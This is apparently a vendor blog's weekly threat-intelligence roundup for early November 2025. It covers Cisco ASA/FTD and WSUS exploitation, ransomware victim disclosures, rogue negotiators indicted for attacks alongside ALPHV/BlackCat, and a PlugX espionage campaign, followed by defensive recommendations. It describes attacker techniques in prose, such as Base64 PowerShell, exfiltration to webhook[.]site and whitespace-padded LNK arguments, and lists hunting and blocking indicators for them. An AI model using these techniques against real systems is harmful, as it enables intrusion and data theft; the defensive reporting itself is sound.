Published: November 07, 20255 min read

Secure: Threat Intelligence Weekly Roundup (November 2-7, 2025)

For the latest discoveries in cyber research for the week of November 2-7, 2025.

By Secure.com
Secure: Threat Intelligence Weekly Roundup (November 2-7, 2025)

This week, the cyber landscape saw an alarming mix of speed, sophistication, and insider betrayal. A new Cisco firewall attack variant triggered denial-of-service conditions on November 5, while WSUS exploitation continued to spread, compromising at least 50 organizations since late October. The Department of Justice revealed that ransomware negotiators were indicted for launching their own attacks alongside the ALPHV/BlackCat gang.

A day later, coordinated ransomware disclosures swept through banking, hospitality, and research sectors, as Chinese state-backed actors sustained espionage campaigns across Europe. With attacks now unfolding in under 24 hours, the week’s events made one thing clear: the detection window is collapsing, and even trusted defenders demand scrutiny.

Here’s a detailed look at the stories shaping this week in cybersecurity.

Top Attacks and Breaches

Cisco Firewall Zero-Days See New Attack Variant (CVE-2025-20333, CVE-2025-20362)

On November 5, 2025, Cisco became aware of a new attack variant targeting devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software. This attack can cause unpatched devices to unexpectedly reload, leading to denial-of-service (DoS) conditions.

Key Details:

  • Both vulnerabilities were disclosed in late September 2025, but were exploited as zero-days in attacks delivering malware such as RayInitiator and LINE VIPER
  • CVE-2025-20333 allows attackers to execute arbitrary code as root using crafted HTTP requests; CVE-2025-20362 makes it possible to access a restricted URL without authentication
  • The sophisticated state-sponsored campaign has been actively exploiting these critical zero-day vulnerabilities since May 2025, attributed to UAT4356/Storm-1849 (linked to China-based threat actors)
  • CISA issued Emergency Directive ED 25-03 requiring federal agencies to identify, analyze, and mitigate potential compromises immediately

Immediate Actions:

  • Apply Cisco's fixed software releases immediately
  • Verify firewall devices have patches addressing both CVEs
  • Monitor for unusual SSLVPN activity indicating exploit attempts
  • Collect forensics from affected devices for analysis

WSUS Zero-Day Exploitation Continues (CVE-2025-59287)

A critical Windows Server Update Services (WSUS) flaw allowing remote code execution with SYSTEM privileges continues to be actively exploited. CISA issued an emergency directive mandating immediate patching across federal networks.

Attack Details:

  • Exploitation began October 24, 2025 - one day after Microsoft's out-of-band patch
  • At least 50 organizations compromised across universities, technology, manufacturing, and healthcare sectors
  • Attackers execute Base64-encoded PowerShell commands and exfiltrate data to webhook[.]site endpoints
  • Six incidents confirmed by Sophos in customer environments; additional attack chain discovered involving mmc.exe

Why This Matters: The real danger lies in WSUS's role as the nerve center of enterprise Windows patching. Compromise it, and an attacker can potentially extend their reach across a network, echoing classic supply-chain abuse like SolarWinds.

November 6 Ransomware Wave Hits Multiple Sectors

On November 6, 2025, ransomware groups disclosed multiple new victims across various industries, representing a coordinated surge in extortion activities.

Confirmed Victims (Nov 6):

  • LaRosa's Pizza - Medusa ransomware
  • Habib Bank AG - Qilin ransomware
  • McIntosh Labs - SafePay ransomware
  • Nobu Restaurants - Akira ransomware
  • Kiss FM (Spain) - Rhysida ransomware
  • Oxford University Clinical Research Unit - Devman ransomware

Sector Impact: Financial services, hospitality, media, healthcare research, and food service industries all targeted simultaneously, indicating opportunistic "big game hunting" strategies.

Everest Ransomware Multi-Target Campaign

The Everest ransomware group claimed responsibility for attacks impacting AT&T, Dublin Airport, Air Arabia, and Sweden's national power grid operator Svenska kraftnät.

Victims and Data Stolen:

  • AT&T: 576,000 applicant records
  • Dublin Airport: 1.5 million passenger files
  • Air Arabia: 18,000 employee records
  • Svenska kraftnät: 280 GB of internal data from Sweden's power grid operator

Critical Infrastructure Alert: Power grid targeting represents national security risk beyond typical ransomware operations. Aviation and telecommunications sectors also heavily impacted.

DOJ Indicts Rogue Ransomware Negotiators

The Department of Justice indicted three people, including two U.S. ransomware negotiators, accused of working with the ALPHV/BlackCat ransomware gang to carry out attacks of their own.

The Accused:

  • Kevin Tyler Martin and another unnamed employee from DigitalMint (ransomware negotiation firm)
  • Ryan Clifford Goldberg, former incident response manager at Sygnia
  • Charged with three counts of computer hacking and extortion related to attempted ransomware attacks against at least five U.S.-based companies

Insider Threat Implications: The three are accused of hacking into companies, stealing sensitive data, and deploying ALPHV/BlackCat ransomware. Sygnia confirmed Goldberg's termination after learning of his alleged involvement; DigitalMint stated Martin was "acting completely outside the scope of his employment."

Chinese APT Group UNC6384 Targets European Diplomatic Entities

China-affiliated threat actors targeted European diplomatic entities in Hungary, Belgium, Italy, Netherlands, and Serbia using EU/NATO-themed spear-phishing to deliver PlugX malware.

Attack Chain:

  • Exploits CVE-2025-9491, a Windows LNK file vulnerability known since 2017, publicly disclosed March 2025
  • Malicious LNK files hide command arguments with whitespace padding to evade detection
  • Malware arsenal includes PlugX, KrustyLoader, SNOWLIGHT, VShell, and GOREVERSE

Note: Microsoft has not patched this vulnerability despite public disclosure in March 2025.

Threat Landscape Analysis

Ransomware attacks rose 28% month-over-month to 421 incidents - the first increase in six months.

Key Metrics:

  • Scattered Spider increased deployment speed by 48%; average attack now completes in 24 hours
  • Europe accounts for 22% of global ransomware victims; 92% of European cases involve both file encryption and data theft
  • 260 initial access brokers advertised access to over 1,400 European organizations

Active Threat Groups:

  • RansomHub, Medusa, Qilin, Akira, Rhysida, SafePay, Devman - All active in November 6 disclosure wave
  • LockBit 4.0: Re-emerged with updated toolkit, aggressive US private sector campaigns
  • Everest - Critical infrastructure and transportation targeting

AI-Enhanced Threats

AI lowers the skill floor for phishing, deepfakes, and social-engineering campaigns while increasing the scale and believability of threats. As LLMs and generative tools become ubiquitous, adversaries weaponize them just as quickly as defenders deploy them.

Identity Attack Surge: In the first half of 2025 alone, identity-based attacks surged by 32%. More than 97% of identity attacks are password attacks.

Recommendations

Critical Actions (Week of Nov 2-7)

Immediate Patching:

  • Deploy Cisco ASA/FTD patches for CVE-2025-20333 and CVE-2025-20362
  • Apply WSUS patches (CVE-2025-59287) immediately
  • Update Cisco Unified CCX (CVE-2025-20354, CVE-2025-20358)
  • Address CISA KEV entries (CVE-2025-11371, CVE-2025-48703)

Threat Hunting:

  • Monitor for Base64-encoded PowerShell execution from wsusservice.exe
  • Check for unusual SSLVPN activity on Cisco firewalls
  • Search for EU/NATO-themed phishing emails with LNK attachments
  • Review logs for webhook[.]site exfiltration attempts

Access Controls:

  • Implement phishing-resistant MFA across remote access
  • Audit privileged access to patch management systems
  • Review vendor access after DigitalMint/Sygnia insider threat case
  • Verify WSUS network segmentation from production systems

Strategic Priorities

Defense in Depth:

  • Network segmentation to isolate critical infrastructure (WSUS, firewalls)
  • Air-gapped backups with regular restoration testing
  • EDR with behavioral analytics for 24-hour attack detection

Incident Response:

  • Conduct ransomware tabletop exercises focused on 24-hour attack scenarios
  • Review vendor due diligence for negotiation/IR firms
  • Test backup integrity and restoration procedures weekly
  • Establish forensics collection procedures for compromised devices

Protection Coverage

Organizations should verify that the following protections are active:

IPS/IDS Signatures:

  • Cisco ASA/FTD exploitation (CVE-2025-20333, CVE-2025-20362)
  • WSUS Remote Code Execution (CVE-2025-59287)
  • Windows LNK File Exploitation (CVE-2025-9491)
  • PlugX, KrustyLoader, SNOWLIGHT malware C2 traffic

Threat Prevention:

  • Everest, RansomHub, Medusa, Qilin, Akira, Rhysida ransomware indicators
  • ALPHV/BlackCat TTPs
  • UAT4356/Storm-1849 Chinese APT indicators
  • UNC6384 diplomatic targeting IOCs

Email Security:

  • EU/NATO-themed phishing lures
  • Malicious LNK file attachments
  • Base64-encoded payload detection
  • Webhook[.]site domain blocking

Intelligence Summary

The week of November 2-7, 2025 demonstrated continued sophistication in both nation-state and cybercriminal operations. The November 5 discovery of a new Cisco firewall attack variant, combined with ongoing WSUS exploitation affecting at least 50 organizations, and a coordinated November 6 ransomware disclosure wave indicate attackers are moving faster and exploiting vulnerabilities more efficiently than ever.

Most Concerning Development: The DOJ indictment of ransomware negotiators who allegedly worked with ALPHV/BlackCat to conduct their own attacks represents a new insider threat vector that fundamentally challenges trust in third-party incident response relationships.

Critical Takeaway: With attack speeds now averaging 24 hours from initial access to full compromise, detection and response velocity is the critical differentiator between containment and catastrophic breach.

Stay vigilant. Patch aggressively. Test your defenses. Or let digital teammates help you do it best.

Similar Blogs

State of AI in Cybersecurity 2025: What’s Real vs. Hype
Published: November 7, 2025

State of AI in Cybersecurity 2025: What’s Real vs. Hype

AI promises "autonomous SOCs" that eliminate analyst burnout. But in 2025, most tools are noisy interns—not reliable teammates. Here's what actually works.

Read More →
From Headcount to Leverage: Rethinking the Cybersecurity Talent Crisis
Published: November 7, 2025

From Headcount to Leverage: Rethinking the Cybersecurity Talent Crisis

The cybersecurity industry is short 4.8 million people, yet fully staffed SOCs still drown in 1,000+ daily alerts. The real crisis isn't talent; it's a complete failure of operational leverage.

Read More →
What CISOs Get Wrong About Automation (And How to Fix It)
Published: November 3, 2025

What CISOs Get Wrong About Automation (And How to Fix It)

Many CISOs stumble with automation by chasing tools instead of outcomes, automating low-value tasks, and leaving out human oversight.

Read More →